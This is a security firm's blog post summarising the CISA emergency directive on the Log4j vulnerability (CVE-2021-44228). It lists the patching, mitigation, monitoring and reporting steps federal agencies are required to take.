The US Department of Homeland Security’s Cybersecurity Infrastructure and Security Agency (CISA) issued an emergency directive this past Friday concerning the Log4j vulnerability.
According to CISA, the Log4j vulnerability poses an "unacceptable risk" to Federal Civilian Executive Branch agencies and requires emergency action. This determination is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise and the high potential for a compromise of agency information systems.
“The log4j vulnerabilities pose an unacceptable risk to federal network security,” CISA Director Jen Easterly said following the emergency directive. “CISA has issued this emergency directive to drive federal civilian agencies to take action now to protect their networks, focusing first on internet-facing devices that pose the greatest immediate risk.”
Enumerate all solution stacks accepting data input from the internet.
Evaluate all software assets in identified solution stacks against the CISA-managed GitHub repository (https://github.com/cisagov/log4j-affected-db) to determine whether Log4j is present in those assets and if so, whether those assets are affected by the vulnerability.
If the software product is not listed in the repository, request addition by submitting a “pull” request using the link on the GitHub page.
For all software assets that agencies identify as affected by CVE-2021-44228:
Update assets for which patches have been provided. Remediation timelines prescribed in BOD 22-01 “may be adjusted in the case of grave risk to the Federal Enterprise.” Given the criticality of CVE-2021-44228, agencies must immediately patch any vulnerable internet-facing devices for which patches are available, under an emergency change window.
Mitigate the risk of vulnerability exploitation using one of mitigating measures provided at: link.
Remove affected software assets from agency networks.
For all solution stacks containing software that agencies identified as affected: assume compromise, identify common post-exploit sources and activity, and persistently investigate and monitor for signs of malicious activity and anomalous traffic patterns (e.g., JDNI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).
By 5 pm EST on December 28, 2021:
Report all affected software applications identified in (3) above using the provided template, including:
Application name and version
Action taken (e.g. updated, mitigated, removed from agency network)
These required actions apply to agency applications in any information system, including an information system used or operated by another entity on behalf of an agency, that collects, processes, stores, transmits, disseminates or otherwise maintains agency information (i.e. all applications in agency ATO boundaries).
For federal information systems hosted in third-party environments (such as cloud), each agency is responsible for maintaining an inventory of its information systems hosted in those environments (FedRAMP Authorized or otherwise), conducting all necessary reporting to CISA accounting for such systems and working with service providers directly for status updates pertaining to, and to ensure compliance with, this Directive.
The Schneider Downs cybersecurity practice consists of experts offering a comprehensive set of information technology security services, including penetration testing, intrusion prevention/detection review, ransomware security, vulnerability assessments and a robust digital forensics and incident response team. For more information, visit www.schneiderdowns.com/cybersecurity or contact the team at [email protected].
You’ve heard our thoughts… We’d like to hear yours
The Schneider Downs Our Thoughts On blog exists to create a dialogue on issues that are important to organizations and individuals. While we enjoy sharing our ideas and insights, we’re especially interested in what you may have to say. If you have a question or a comment about this article – or any article from the Our Thoughts On blog – we hope you’ll share it with us. After all, a dialogue is an exchange of ideas, and we’d like to hear from you. Email us at [email protected].
Material discussed is meant for informational purposes only, and it is not to be construed as investment, tax, or legal advice. Please note that individual situations can vary. Therefore, this information should be relied upon when coordinated with individual professional advice.